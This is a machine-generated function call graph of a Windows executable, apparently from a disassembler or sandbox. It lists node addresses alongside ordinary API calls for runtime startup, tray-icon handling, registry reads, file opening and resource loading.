97515->97516 97521 e73582 97516->97521 97518 e72754 97520 e7105a 97518->97520 97524 e73416 59 API calls 2 library calls 97518->97524 97520->97512 97525 e735b0 97521->97525 97524->97518 97526 e735a1 97525->97526 97527 e735bd 97525->97527 97526->97518 97527->97526 97528 e735c4 RegOpenKeyExW 97527->97528 97528->97526 97529 e735de RegQueryValueExW 97528->97529 97530 e73614 RegCloseKey 97529->97530 97531 e735ff 97529->97531 97530->97526 97531->97530 97532 e73633 97533 e7366a 97532->97533 97534 e736e7 97533->97534 97535 e73688 97533->97535 97572 e736e5 97533->97572 97537 ead31c 97534->97537 97538 e736ed 97534->97538 97539 e73695 97535->97539 97540 e7375d PostQuitMessage 97535->97540 97536 e736ca DefWindowProcW 97574 e736d8 97536->97574 97582 e811d0 10 API calls Mailbox 97537->97582 97541 e73715 SetTimer RegisterWindowMessageW 97538->97541 97542 e736f2 97538->97542 97543 ead38f 97539->97543 97544 e736a0 97539->97544 97540->97574 97549 e7373e CreatePopupMenu 97541->97549 97541->97574 97547 ead2bf 97542->97547 97548 e736f9 KillTimer 97542->97548 97597 ed2a16 71 API calls _memset 97543->97597 97550 e73767 97544->97550 97551 e736a8 97544->97551 97546 ead343 97583 e811f3 341 API calls Mailbox 97546->97583 97556 ead2f8 MoveWindow 97547->97556 97557 ead2c4 97547->97557 97577 e744cb Shell_NotifyIconW _memset 97548->97577 97549->97574 97580 e74531 64 API calls _memset 97550->97580 97559 e736b3 97551->97559 97560 ead374 97551->97560 97553 ead3a1 97553->97536 97553->97574 97556->97574 97563 ead2c8 97557->97563 97564 ead2e7 SetFocus 97557->97564 97561 e7374b 97559->97561 97570 e736be 97559->97570 97560->97536 97596 ec817e 59 API calls Mailbox 97560->97596 97579 e745df 81 API calls _memset 97561->97579 97562 e7375b 97562->97574 97567 ead2d1 97563->97567 97563->97570 97564->97574 97565 e7370c 97578 e73114 DeleteObject DestroyWindow Mailbox 97565->97578 97581 e811d0 10 API calls Mailbox 97567->97581 97570->97536 97584 e744cb Shell_NotifyIconW _memset 97570->97584 97572->97536 97575 ead368 97585 e743db 97575->97585 97577->97565 97578->97574 97579->97562 97580->97562 97581->97574 97582->97546 97583->97570 97584->97575 97586 e74406 _memset 97585->97586 97598 e74213 97586->97598 97590 e744a5 Shell_NotifyIconW 97593 e744b3 97590->97593 97591 e744c1 Shell_NotifyIconW 97591->97593 97592 e7448b 97592->97590 97592->97591 97602 e7410d 97593->97602 97595 e744ba 97595->97572 97596->97572 97597->97553 97599 e74227 97598->97599 97600 ead638 97598->97600 97599->97592 97624 ed3226 62 API calls _W_store_winword 97599->97624 97600->97599 97601 ead641 DestroyIcon 97600->97601 97601->97599 97603 e74129 97602->97603 97623 e74200 Mailbox 97602->97623 97625 e77b76 97603->97625 97606 e74144 97608 e77d2c 59 API calls 97606->97608 97607 ead5dd LoadStringW 97610 ead5f7 97607->97610 97609 e74159 97608->97609 97609->97610 97611 e7416a 97609->97611 97612 e77c8e 59 API calls 97610->97612 97613 e74205 97611->97613 97614 e74174 97611->97614 97617 ead601 97612->97617 97639 e781a7 97613->97639 97630 e77c8e 97614->97630 97620 e7417e _memset _wcscpy 97617->97620 97643 e77e0b 97617->97643 97619 ead623 97622 e77e0b 59 API calls 97619->97622 97621 e741e6 Shell_NotifyIconW 97620->97621 97621->97623 97622->97620 97623->97595 97624->97592 97626 e90ff6 Mailbox 59 API calls 97625->97626 97627 e77b9b 97626->97627 97628 e78189 59 API calls 97627->97628 97629 e74137 97628->97629 97629->97606 97629->97607 97631 e77ca0 97630->97631 97632 eaf094 97630->97632 97650 e77bb1 97631->97650 97656 ec8123 59 API calls _memmove 97632->97656 97635 eaf09e 97637 e781a7 59 API calls 97635->97637 97636 e77cac 97636->97620 97638 eaf0a6 Mailbox 97637->97638 97640 e781b2 97639->97640 97641 e781ba 97639->97641 97657 e780d7 59 API calls 2 library calls 97640->97657 97641->97620 97644 e77e1f 97643->97644 97645 eaf173 97643->97645 97658 e77db0 97644->97658 97647 e78189 59 API calls 97645->97647 97649 eaf17e __NMSG_WRITE _memmove 97647->97649 97648 e77e2a 97648->97619 97651 e77bbf 97650->97651 97655 e77be5 _memmove 97650->97655 97652 e90ff6 Mailbox 59 API calls 97651->97652 97651->97655 97653 e77c34 97652->97653 97654 e90ff6 Mailbox 59 API calls 97653->97654 97654->97655 97655->97636 97656->97635 97657->97641 97659 e77dbf __NMSG_WRITE 97658->97659 97660 e78189 59 API calls 97659->97660 97661 e77dd0 _memmove 97659->97661 97662 eaf130 _memmove 97660->97662 97661->97648 97663 e97e93 97664 e97e9f __ioinit 97663->97664 97700 e9a048 GetStartupInfoW 97664->97700 97667 e97efc 97669 e97f07 97667->97669 97785 e97fe3 58 API calls 3 library calls 97667->97785 97668 e97ea4 97702 e98dbc GetProcessHeap 97668->97702 97703 e99d26 97669->97703 97672 e97f0d 97673 e97f18 __RTC_Initialize 97672->97673 97786 e97fe3 58 API calls 3 library calls 97672->97786 97724 e9d812 97673->97724 97676 e97f27 97677 e97f33 GetCommandLineW 97676->97677 97787 e97fe3 58 API calls 3 library calls 97676->97787 97743 ea5173 GetEnvironmentStringsW 97677->97743 97680 e97f32 97680->97677 97683 e97f58 97753 ea4fa8 97683->97753 97684 e97f4d 97684->97683 97788 e932f5 58 API calls 3 library calls 97684->97788 97687 e97f5e 97688 e97f69 97687->97688 97789 e932f5 58 API calls 3 library calls 97687->97789 97767 e9332f 97688->97767 97691 e97f71 97692 e97f7c __wwincmdln 97691->97692 97790 e932f5 58 API calls 3 library calls 97691->97790 97773 e7492e 97692->97773 97695 e97f90 97696 e97f9f 97695->97696 97791 e93598 58 API calls _doexit 97695->97791 97792 e93320 58 API calls _doexit 97696->97792 97699 e97fa4 __ioinit 97701 e9a05e 97700->97701 97701->97668 97702->97667 97793 e933c7 36 API calls 2 library calls 97703->97793 97705 e99d2b 97794 e99f7c InitializeCriticalSectionAndSpinCount __mtinitlocks 97705->97794 97707 e99d30 97708 e99d34 97707->97708 97796 e99fca TlsAlloc 97707->97796 97795 e99d9c 61 API calls 2 library calls 97708->97795 97711 e99d39 97711->97672 97712 e99d46 97712->97708 97713 e99d51 97712->97713 97797 e98a15 97713->97797 97716 e99d93 97805 e99d9c 61 API calls 2 library calls 97716->97805 97719 e99d72 97719->97716 97721 e99d78 97719->97721 97720 e99d98 97720->97672 97804 e99c73 58 API calls 4 library calls 97721->97804 97723 e99d80 GetCurrentThreadId 97723->97672 97725 e9d81e __ioinit 97724->97725 97726 e99e4b __lock 58 API calls 97725->97726 97727 e9d825 97726->97727 97728 e98a15 __calloc_crt 58 API calls 97727->97728 97730 e9d836 97728->97730 97729 e9d8a1 GetStartupInfoW 97731 e9d9e5 97729->97731 97733 e9d8b6 97729->97733 97730->97729 97732 e9d841 __ioinit @_EH4_CallFilterFunc@8 97730->97732 97734 e9daad 97731->97734 97737 e9da32 GetStdHandle 97731->97737 97738 e9da45 GetFileType 97731->97738 97818 e9a06b InitializeCriticalSectionAndSpinCount 97731->97818 97732->97676 97733->97731 97736 e98a15 __calloc_crt 58 API calls 97733->97736 97740 e9d904 97733->97740 97819 e9dabd LeaveCriticalSection _doexit 97734->97819 97736->97733 97737->97731 97738->97731 97739 e9d938 GetFileType 97739->97740 97740->97731 97740->97739 97817 e9a06b InitializeCriticalSectionAndSpinCount 97740->97817 97744 e97f43 97743->97744 97745 ea5184 97743->97745 97749 ea4d6b GetModuleFileNameW 97744->97749 97820 e98a5d 58 API calls 2 library calls 97745->97820 97747 ea51aa _memmove 97748 ea51c0 FreeEnvironmentStringsW 97747->97748 97748->97744 97750 ea4d9f _wparse_cmdline 97749->97750 97752 ea4ddf _wparse_cmdline 97750->97752 97821 e98a5d 58 API calls 2 library calls 97750->97821 97752->97684 97754 ea4fc1 __NMSG_WRITE 97753->97754 97758 ea4fb9 97753->97758 97755 e98a15 __calloc_crt 58 API calls 97754->97755 97763 ea4fea __NMSG_WRITE 97755->97763 97756 ea5041 97757 e92f95 _free 58 API calls 97756->97757 97757->97758 97758->97687 97759 e98a15 __calloc_crt 58 API calls 97759->97763 97760 ea5066 97761 e92f95 _free 58 API calls 97760->97761 97761->97758 97763->97756 97763->97758 97763->97759 97763->97760 97764 ea507d 97763->97764 97822 ea4857 58 API calls __wopenfile 97763->97822 97823 e99006 IsProcessorFeaturePresent 97764->97823 97766 ea5089 97766->97687 97769 e9333b __IsNonwritableInCurrentImage 97767->97769 97846 e9a711 97769->97846 97770 e93359 __initterm_e 97771 e92f80 __cinit 67 API calls 97770->97771 97772 e93378 _doexit __IsNonwritableInCurrentImage 97770->97772 97771->97772 97772->97691 97774 e74948 97773->97774 97784 e749e7 97773->97784 97775 e74982 IsThemeActive 97774->97775 97849 e935ac 97775->97849 97779 e749ae 97861 e74a5b SystemParametersInfoW SystemParametersInfoW 97779->97861 97781 e749ba 97862 e73b4c 97781->97862 97783 e749c2 SystemParametersInfoW 97783->97784 97784->97695 97785->97669 97786->97673 97787->97680 97791->97696 97792->97699 97793->97705 97794->97707 97795->97711 97796->97712 97799 e98a1c 97797->97799 97800 e98a57 97799->97800 97801 e98a3a 97799->97801 97806 ea5446 97799->97806 97800->97716 97803 e9a026 TlsSetValue 97800->97803 97801->97799 97801->97800 97814 e9a372 Sleep 97801->97814 97803->97719 97804->97723 97805->97720 97807 ea5451 97806->97807 97811 ea546c 97806->97811 97808 ea545d 97807->97808 97807->97811 97815 e98d68 58 API calls __getptd_noexit 97808->97815 97810 ea547c HeapAlloc 97810->97811 97812 ea5462 97810->97812 97811->97810 97811->97812 97816 e935e1 DecodePointer 97811->97816 97812->97799 97814->97801 97815->97812 97816->97811 97817->97740 97818->97731 97819->97732 97820->97747 97821->97752 97822->97763 97824 e99011 97823->97824 97829 e98e99 97824->97829 97828 e9902c 97828->97766 97830 e98eb3 _memset __call_reportfault 97829->97830 97831 e98ed3 IsDebuggerPresent 97830->97831 97837 e9a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 97831->97837 97834 e98f97 __call_reportfault 97838 e9c836 97834->97838 97835 e98fba 97836 e9a380 GetCurrentProcess TerminateProcess 97835->97836 97836->97828 97837->97834 97839 e9c83e 97838->97839 97840 e9c840 IsProcessorFeaturePresent 97838->97840 97839->97835 97842 ea5b5a 97840->97842 97845 ea5b09 5 API calls 2 library calls 97842->97845 97844 ea5c3d 97844->97835 97845->97844 97847 e9a714 EncodePointer 97846->97847 97847->97847 97848 e9a72e 97847->97848 97848->97770 97850 e99e4b __lock 58 API calls 97849->97850 97851 e935b7 DecodePointer EncodePointer 97850->97851 97914 e99fb5 LeaveCriticalSection 97851->97914 97853 e749a7 97854 e93614 97853->97854 97855 e93638 97854->97855 97856 e9361e 97854->97856 97855->97779 97856->97855 97915 e98d68 58 API calls __getptd_noexit 97856->97915 97858 e93628 97916 e98ff6 9 API calls __wopenfile 97858->97916 97860 e93633 97860->97779 97861->97781 97863 e73b59 __ftell_nolock 97862->97863 97864 e777c7 59 API calls 97863->97864 97865 e73b63 GetCurrentDirectoryW 97864->97865 97917 e73778 97865->97917 97867 e73b8c IsDebuggerPresent 97868 ead4ad MessageBoxA 97867->97868 97869 e73b9a 97867->97869 97872 ead4c7 97868->97872 97870 e73c73 97869->97870 97869->97872 97873 e73bb7 97869->97873 97871 e73c7a SetCurrentDirectoryW 97870->97871 97874 e73c87 Mailbox 97871->97874 98116 e77373 59 API calls Mailbox 97872->98116 97998 e773e5 97873->97998 97874->97783 97877 ead4d7 97882 ead4ed SetCurrentDirectoryW 97877->97882 97879 e73bd5 GetFullPathNameW 97880 e77d2c 59 API calls 97879->97880 97881 e73c10 97880->97881 98014 e80a8d 97881->98014 97882->97874 97914->97853 97915->97858 97916->97860 97918 e777c7 59 API calls 97917->97918 97919 e7378e 97918->97919 98129 e73d43 97919->98129 97921 e737ac 97922 e74864 61 API calls 97921->97922 97923 e737c0 97922->97923 97924 e77f41 59 API calls 97923->97924 97925 e737cd 97924->97925 98143 e74f3d 97925->98143 97928 ead3ae 98210 ed97e5 97928->98210 97929 e737ee Mailbox 97933 e781a7 59 API calls 97929->97933 97932 ead3cd 97935 e92f95 _free 58 API calls 97932->97935 97936 e73801 97933->97936 97938 ead3da 97935->97938 98167 e793ea 97936->98167 97939 e74faa 84 API calls 97938->97939 97941 ead3e3 97939->97941 97945 e73ee2 59 API calls 97941->97945 97942 e77f41 59 API calls 97943 e7381a 97942->97943 98170 e78620 97943->98170 97947 ead3fe 97945->97947 97946 e7382c Mailbox 97948 e77f41 59 API calls 97946->97948 97949 e73ee2 59 API calls 97947->97949 97950 e73852 97948->97950 97952 ead41a 97949->97952 97951 e78620 69 API calls 97950->97951 97956 e73861 Mailbox 97951->97956 97953 e74864 61 API calls 97952->97953 97954 ead43f 97953->97954 97955 e73ee2 59 API calls 97954->97955 97958 ead44b 97955->97958 97957 e777c7 59 API calls 97956->97957 97960 e7387f 97957->97960 97959 e781a7 59 API calls 97958->97959 97961 ead459 97959->97961 98174 e73ee2 97960->98174 97963 e73ee2 59 API calls 97961->97963 97965 ead468 97963->97965 97971 e781a7 59 API calls 97965->97971 97967 e73899 97967->97941 97968 e738a3 97967->97968 97969 e9313d _W_store_winword 60 API calls 97968->97969 97970 e738ae 97969->97970 97970->97947 97972 e738b8 97970->97972 97973 ead48a 97971->97973 97974 e9313d _W_store_winword 60 API calls 97972->97974 97975 e73ee2 59 API calls 97973->97975 97976 e738c3 97974->97976 97977 ead497 97975->97977 97976->97952 97978 e738cd 97976->97978 97977->97977 97979 e9313d _W_store_winword 60 API calls 97978->97979 97980 e738d8 97979->97980 97980->97965 97981 e73919 97980->97981 97983 e73ee2 59 API calls 97980->97983 97981->97965 97982 e73926 97981->97982 98190 e7942e 97982->98190 97984 e738fc 97983->97984 97986 e781a7 59 API calls 97984->97986 97988 e7390a 97986->97988 97990 e73ee2 59 API calls 97988->97990 97990->97981 97993 e793ea 59 API calls 97995 e73961 97993->97995 97994 e79040 60 API calls 97994->97995 97995->97993 97995->97994 97996 e73ee2 59 API calls 97995->97996 97997 e739a7 Mailbox 97995->97997 97996->97995 97997->97867 97999 e773f2 __ftell_nolock 97998->97999 98000 eaee4b _memset 97999->98000 98001 e7740b 97999->98001 98003 eaee67 GetOpenFileNameW 98000->98003 99064 e748ae 98001->99064 98006 eaeeb6 98003->98006 98008 e77d2c 59 API calls 98006->98008 98010 eaeecb 98008->98010 98010->98010 98011 e77429 99092 e769ca 98011->99092 98116->97877 98130 e73d50 __ftell_nolock 98129->98130 98131 e77d2c 59 API calls 98130->98131 98136 e73eb6 Mailbox 98130->98136 98132 e73d82 98131->98132 98141 e73db8 Mailbox 98132->98141 98251 e77b52 98132->98251 98134 e73e89 98135 e77f41 59 API calls 98134->98135 98134->98136 98138 e73eaa 98135->98138 98136->97921 98137 e77f41 59 API calls 98137->98141 98139 e73f84 59 API calls 98138->98139 98139->98136 98141->98134 98141->98136 98141->98137 98142 e77b52 59 API calls 98141->98142 98254 e73f84 98141->98254 98142->98141 98260 e74d13 98143->98260 98148 eadd0f 98150 e74faa 84 API calls 98148->98150 98149 e74f68 LoadLibraryExW 98270 e74cc8 98149->98270 98152 eadd16 98150->98152 98154 e74cc8 3 API calls 98152->98154 98156 eadd1e 98154->98156 98296 e7506b 98156->98296 98157 e74f8f 98157->98156 98158 e74f9b 98157->98158 98160 e74faa 84 API calls 98158->98160 98161 e737e6 98160->98161 98161->97928 98161->97929 98164 eadd45 98302 e75027 98164->98302 98166 eadd52 98168 e90ff6 Mailbox 59 API calls 98167->98168 98169 e7380d 98168->98169 98169->97942 98171 e7862b 98170->98171 98172 e78652 98171->98172 98727 e78b13 69 API calls Mailbox 98171->98727 98172->97946 98175 e73f05 98174->98175 98176 e73eec 98174->98176 98178 e77d2c 59 API calls 98175->98178 98177 e781a7 59 API calls 98176->98177 98179 e7388b 98177->98179 98178->98179 98180 e9313d 98179->98180 98181 e93149 98180->98181 98182 e931be 98180->98182 98188 e9316e 98181->98188 98728 e98d68 58 API calls __getptd_noexit 98181->98728 98730 e931d0 60 API calls 3 library calls 98182->98730 98185 e931cb 98185->97967 98186 e93155 98729 e98ff6 9 API calls __wopenfile 98186->98729 98188->97967 98189 e93160 98189->97967 98191 e79436 98190->98191 98192 e90ff6 Mailbox 59 API calls 98191->98192 98193 e79444 98192->98193 98194 e73936 98193->98194 98731 e7935c 59 API calls Mailbox 98193->98731 98196 e791b0 98194->98196 98732 e792c0 98196->98732 98198 e791bf 98199 e90ff6 Mailbox 59 API calls 98198->98199 98200 e73944 98198->98200 98199->98200 98201 e79040 98200->98201 98202 eaf5a5 98201->98202 98204 e79057 98201->98204 98202->98204 98742 e78d3b 59 API calls Mailbox 98202->98742 98205 e791a0 98204->98205 98206 e79158 98204->98206 98209 e7915f 98204->98209 98741 e79e9c 60 API calls Mailbox 98205->98741 98208 e90ff6 Mailbox 59 API calls 98206->98208 98208->98209 98209->97995 98211 e75045 85 API calls 98210->98211 98212 ed9854 98211->98212 98743 ed99be 96 API calls 2 library calls 98212->98743 98214 ed9866 98215 e7506b 74 API calls 98214->98215 98241 ead3c1 98214->98241 98216 ed9881 98215->98216 98217 e7506b 74 API calls 98216->98217 98218 ed9891 98217->98218 98219 e7506b 74 API calls 98218->98219 98220 ed98ac 98219->98220 98221 e7506b 74 API calls 98220->98221 98222 ed98c7 98221->98222 98223 e75045 85 API calls 98222->98223 98224 ed98de 98223->98224 98225 e9594c _W_store_winword 58 API calls 98224->98225 98226 ed98e5 98225->98226 98227 e9594c _W_store_winword 58 API calls 98226->98227 98228 ed98ef 98227->98228 98229 e7506b 74 API calls 98228->98229 98230 ed9903 98229->98230 98744 ed9393 GetSystemTimeAsFileTime 98230->98744 98232 ed9916 98233 ed992b 98232->98233 98234 ed9940 98232->98234 98235 e92f95 _free 58 API calls 98233->98235 98236 ed99a5 98234->98236 98237 ed9946 98234->98237 98239 ed9931 98235->98239 98238 e92f95 _free 58 API calls 98236->98238 98745 ed8d90 98237->98745 98238->98241 98242 e92f95 _free 58 API calls 98239->98242 98241->97932 98245 e74faa 98241->98245 98242->98241 98244 e92f95 _free 58 API calls 98244->98241 98246 e74fb4 98245->98246 98247 e74fbb 98245->98247 98248 e955d6 __fcloseall 83 API calls 98246->98248 98249 e74fdb FreeLibrary 98247->98249 98250 e74fca 98247->98250 98248->98247 98249->98250 98250->97932 98252 e77faf 59 API calls 98251->98252 98253 e77b5d 98252->98253 98253->98132 98255 e73f92 98254->98255 98259 e73fb4 _memmove 98254->98259 98257 e90ff6 Mailbox 59 API calls 98255->98257 98256 e90ff6 Mailbox 59 API calls 98258 e73fc8 98256->98258 98257->98259 98258->98141 98259->98256 98307 e74d61 98260->98307 98263 e74d3a 98265 e74d53 98263->98265 98266 e74d4a FreeLibrary 98263->98266 98264 e74d61 2 API calls 98264->98263 98267 e9548b 98265->98267 98266->98265 98311 e954a0 98267->98311 98269 e74f5c 98269->98148 98269->98149 98469 e74d94 98270->98469 98273 e74d94 2 API calls 98276 e74ced 98273->98276 98274 e74cff FreeLibrary 98275 e74d08 98274->98275 98277 e74dd0 98275->98277 98276->98274 98276->98275 98278 e90ff6 Mailbox 59 API calls 98277->98278 98279 e74de5 98278->98279 98473 e7538e 98279->98473 98281 e74df1 _memmove 98282 e74e2c 98281->98282 98284 e74f21 98281->98284 98285 e74ee9 98281->98285 98283 e75027 69 API calls 98282->98283 98292 e74e35 98283->98292 98487 ed9ba5 95 API calls 98284->98487 98476 e74fe9 CreateStreamOnHGlobal 98285->98476 98288 e7506b 74 API calls 98288->98292 98290 e74ec9 98290->98157 98291 eadcd0 98293 e75045 85 API calls 98291->98293 98292->98288 98292->98290 98292->98291 98482 e75045 98292->98482 98294 eadce4 98293->98294 98295 e7506b 74 API calls 98294->98295 98295->98290 98297 e7507d 98296->98297 98298 eaddf6 98296->98298 98511 e95812 98297->98511 98301 ed9393 GetSystemTimeAsFileTime 98301->98164 98303 e75036 98302->98303 98304 eaddb9 98302->98304 98709 e95e90 98303->98709 98306 e7503e 98306->98166 98308 e74d2e 98307->98308 98309 e74d6a LoadLibraryA 98307->98309 98308->98263 98308->98264 98309->98308 98310 e74d7b GetProcAddress 98309->98310 98310->98308 98312 e954ac __ioinit 98311->98312 98313 e954bf 98312->98313 98316 e954f0 98312->98316 98360 e98d68 58 API calls __getptd_noexit 98313->98360 98315 e954c4 98361 e98ff6 9 API calls __wopenfile 98315->98361 98330 ea0738 98316->98330 98319 e954f5 98320 e9550b 98319->98320 98321 e954fe 98319->98321 98323 e95535 98320->98323 98324 e95515 98320->98324 98362 e98d68 58 API calls __getptd_noexit 98321->98362 98345 ea0857 98323->98345 98363 e98d68 58 API calls __getptd_noexit 98324->98363 98327 e954cf __ioinit @_EH4_CallFilterFunc@8 98327->98269 98331 ea0744 __ioinit 98330->98331 98332 e99e4b __lock 58 API calls 98331->98332 98343 ea0752 98332->98343 98333 ea07c6 98365 ea084e 98333->98365 98334 ea07cd 98370 e98a5d 58 API calls 2 library calls 98334->98370 98337 ea07d4 98337->98333 98371 e9a06b InitializeCriticalSectionAndSpinCount 98337->98371 98338 ea0843 __ioinit 98338->98319 98340 e99ed3 __mtinitlocknum 58 API calls 98340->98343 98342 ea07fa EnterCriticalSection 98342->98333 98343->98333 98343->98334 98343->98340 98368 e96e8d 59 API calls __lock 98343->98368 98369 e96ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98343->98369 98354 ea0877 __wopenfile 98345->98354 98346 ea0891 98376 e98d68 58 API calls __getptd_noexit 98346->98376 98347 ea0a4c 98347->98346 98351 ea0aaf 98347->98351 98349 ea0896 98377 e98ff6 9 API calls __wopenfile 98349->98377 98373 ea87f1 98351->98373 98352 e95540 98364 e95562 LeaveCriticalSection LeaveCriticalSection _fseek 98352->98364 98354->98346 98354->98347 98378 e93a0b 60 API calls 2 library calls 98354->98378 98356 ea0a45 98356->98347 98379 e93a0b 60 API calls 2 library calls 98356->98379 98358 ea0a64 98358->98347 98380 e93a0b 60 API calls 2 library calls 98358->98380 98360->98315 98361->98327 98362->98327 98363->98327 98364->98327 98372 e99fb5 LeaveCriticalSection 98365->98372 98367 ea0855 98367->98338 98368->98343 98369->98343 98370->98337 98371->98342 98372->98367 98381 ea7fd5 98373->98381 98375 ea880a 98375->98352 98376->98349 98377->98352 98378->98356 98379->98358 98380->98347 98382 ea7fe1 __ioinit 98381->98382 98383 ea7ff7 98382->98383 98386 ea802d 98382->98386 98466 e98d68 58 API calls __getptd_noexit 98383->98466 98385 ea7ffc 98467 e98ff6 9 API calls __wopenfile 98385->98467 98392 ea809e 98386->98392 98389 ea8049 98468 ea8072 LeaveCriticalSection __unlock_fhandle 98389->98468 98391 ea8006 __ioinit 98391->98375 98393 ea80be 98392->98393 98394 e9471a __wsopen_nolock 58 API calls 98393->98394 98396 ea80da 98394->98396 98395 e99006 __invoke_watson 8 API calls 98397 ea87f0 98395->98397 98398 ea8114 98396->98398 98406 ea8137 98396->98406 98414 ea8211 98396->98414 98399 ea7fd5 __wsopen_helper 103 API calls 98397->98399 98400 e98d34 __free_osfhnd 58 API calls 98398->98400 98401 ea880a 98399->98401 98402 ea8119 98400->98402 98401->98389 98403 e98d68 __wopenfile 58 API calls 98402->98403 98404 ea8126 98403->98404 98407 e98ff6 __wopenfile 9 API calls 98404->98407 98405 ea81f5 98408 e98d34 __free_osfhnd 58 API calls 98405->98408 98406->98405 98409 ea81d3 98406->98409 98434 ea8130 98407->98434 98410 ea81fa 98408->98410 98415 e9d4d4 __alloc_osfhnd 61 API calls 98409->98415 98411 e98d68 __wopenfile 58 API calls 98410->98411 98412 ea8207 98411->98412 98413 e98ff6 __wopenfile 9 API calls 98412->98413 98413->98414 98414->98395 98416 ea82a1 98415->98416 98417 ea82ab 98416->98417 98418 ea82ce 98416->98418 98419 e98d34 __free_osfhnd 58 API calls 98417->98419 98420 ea7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98418->98420 98421 ea82b0 98419->98421 98431 ea82f0 98420->98431 98422 e98d68 __wopenfile 58 API calls 98421->98422 98424 ea82ba 98422->98424 98423 ea836e GetFileType 98425 ea83bb 98423->98425 98426 ea8379 GetLastError 98423->98426 98429 e98d68 __wopenfile 58 API calls 98424->98429 98437 e9d76a __set_osfhnd 59 API calls 98425->98437 98430 e98d47 __dosmaperr 58 API calls 98426->98430 98427 ea833c GetLastError 98428 e98d47 __dosmaperr 58 API calls 98427->98428 98433 ea8361 98428->98433 98429->98434 98435 ea83a0 CloseHandle 98430->98435 98431->98423 98431->98427 98432 ea7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98431->98432 98436 ea8331 98432->98436 98439 e98d68 __wopenfile 58 API calls 98433->98439 98434->98389 98435->98433 98438 ea83ae 98435->98438 98436->98423 98436->98427 98443 ea83d9 98437->98443 98440 e98d68 __wopenfile 58 API calls 98438->98440 98439->98414 98441 ea83b3 98440->98441 98441->98433 98442 ea8594 98442->98414 98445 ea8767 CloseHandle 98442->98445 98443->98442 98444 ea1b11 __lseeki64_nolock 60 API calls 98443->98444 98462 ea845a 98443->98462 98446 ea8443 98444->98446 98447 ea7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98445->98447 98449 e98d34 __free_osfhnd 58 API calls 98446->98449 98446->98462 98448 ea878e 98447->98448 98450 ea87c2 98448->98450 98451 ea8796 GetLastError 98448->98451 98449->98462 98450->98414 98452 e98d47 __dosmaperr 58 API calls 98451->98452 98454 ea87a2 98452->98454 98453 ea848c 98457 ea99f2 __chsize_nolock 82 API calls 98453->98457 98453->98462 98458 e9d67d __free_osfhnd 59 API calls 98454->98458 98455 ea10ab 70 API calls __read_nolock 98455->98462 98456 ea0d2d __close_nolock 61 API calls 98456->98462 98457->98453 98458->98450 98459 e9dac6 __write 78 API calls 98459->98462 98460 ea8611 98461 ea0d2d __close_nolock 61 API calls 98460->98461 98463 ea8618 98461->98463 98462->98442 98462->98453 98462->98455 98462->98456 98462->98459 98462->98460 98464 ea1b11 60 API calls __lseeki64_nolock 98462->98464 98465 e98d68 __wopenfile 58 API calls 98463->98465 98464->98462 98465->98414 98466->98385 98467->98391 98468->98391 98470 e74ce1 98469->98470 98471 e74d9d LoadLibraryA 98469->98471 98470->98273 98470->98276 98471->98470 98472 e74dae GetProcAddress 98471->98472 98472->98470 98474 e90ff6 Mailbox 59 API calls 98473->98474 98475 e753a0 98474->98475 98475->98281 98477 e75003 FindResourceExW 98476->98477 98481 e75020 98476->98481 98478 eadd5c LoadResource 98477->98478 98477->98481 98479 eadd71 SizeofResource 98478->98479 98478->98481 98480 eadd85 LockResource 98479->98480 98479->98481 98480->98481 98481->98282 98483 e75054 98482->98483 98484 eaddd4 98482->98484 98488 e95a7d 98483->98488 98486 e75062 98486->98292 98487->98282 98489 e95a89 __ioinit 98488->98489 98490 e95a9b 98489->98490 98492 e95ac1 98489->98492 98501 e98d68 58 API calls __getptd_noexit 98490->98501 98503 e96e4e 98492->98503 98493 e95aa0 98502 e98ff6 9 API calls __wopenfile 98493->98502 98496 e95ac7 98509 e959ee 83 API calls 4 library calls 98496->98509 98498 e95ad6 98510 e95af8 LeaveCriticalSection LeaveCriticalSection _fseek 98498->98510 98500 e95aab __ioinit 98500->98486 98501->98493 98502->98500 98504 e96e5e 98503->98504 98505 e96e80 EnterCriticalSection 98503->98505 98504->98505 98506 e96e66 98504->98506 98507 e96e76 98505->98507 98508 e99e4b __lock 58 API calls 98506->98508 98507->98496 98508->98507 98509->98498 98510->98500 98514 e9582d 98511->98514 98513 e7508e 98513->98301 98515 e95839 __ioinit 98514->98515 98516 e9587c 98515->98516 98517 e95874 __ioinit 98515->98517 98523 e9584f _memset 98515->98523 98518 e96e4e __lock_file 59 API calls 98516->98518 98517->98513 98520 e95882 98518->98520 98527 e9564d 98520->98527 98521 e95869 98542 e98ff6 9 API calls __wopenfile 98521->98542 98541 e98d68 58 API calls __getptd_noexit 98523->98541 98528 e95668 _memset 98527->98528 98540 e95683 98527->98540 98529 e95673 98528->98529 98537 e956c3 98528->98537 98528->98540 98639 e98d68 58 API calls __getptd_noexit 98529->98639 98531 e95678 98640 e98ff6 9 API calls __wopenfile 98531->98640 98534 e957d4 _memset 98642 e98d68 58 API calls __getptd_noexit 98534->98642 98537->98534 98537->98540 98544 e94916 98537->98544 98551 ea10ab 98537->98551 98619 ea0df7 98537->98619 98641 ea0f18 58 API calls 3 library calls 98537->98641 98543 e958b6 LeaveCriticalSection LeaveCriticalSection _fseek 98540->98543 98541->98521 98542->98517 98543->98517 98545 e94920 98544->98545 98546 e94935 98544->98546 98643 e98d68 58 API calls __getptd_noexit 98545->98643 98546->98537 98548 e94925 98644 e98ff6 9 API calls __wopenfile 98548->98644 98550 e94930 98550->98537 98552 ea10cc 98551->98552 98553 ea10e3 98551->98553 98654 e98d34 58 API calls __getptd_noexit 98552->98654 98554 ea181b 98553->98554 98559 ea111d 98553->98559 98670 e98d34 58 API calls __getptd_noexit 98554->98670 98556 ea10d1 98655 e98d68 58 API calls __getptd_noexit 98556->98655 98561 ea1125 98559->98561 98566 ea113c 98559->98566 98560 ea1820 98671 e98d68 58 API calls __getptd_noexit 98560->98671 98656 e98d34 58 API calls __getptd_noexit 98561->98656 98564 ea1131 98672 e98ff6 9 API calls __wopenfile 98564->98672 98565 ea112a 98657 e98d68 58 API calls __getptd_noexit 98565->98657 98567 ea1151 98566->98567 98570 ea116b 98566->98570 98572 ea1189 98566->98572 98599 ea10d8 98566->98599 98658 e98d34 58 API calls __getptd_noexit 98567->98658 98570->98567 98575 ea1176 98570->98575 98659 e98a5d 58 API calls 2 library calls 98572->98659 98645 ea5ebb 98575->98645 98576 ea1199 98578 ea11bc 98576->98578 98579 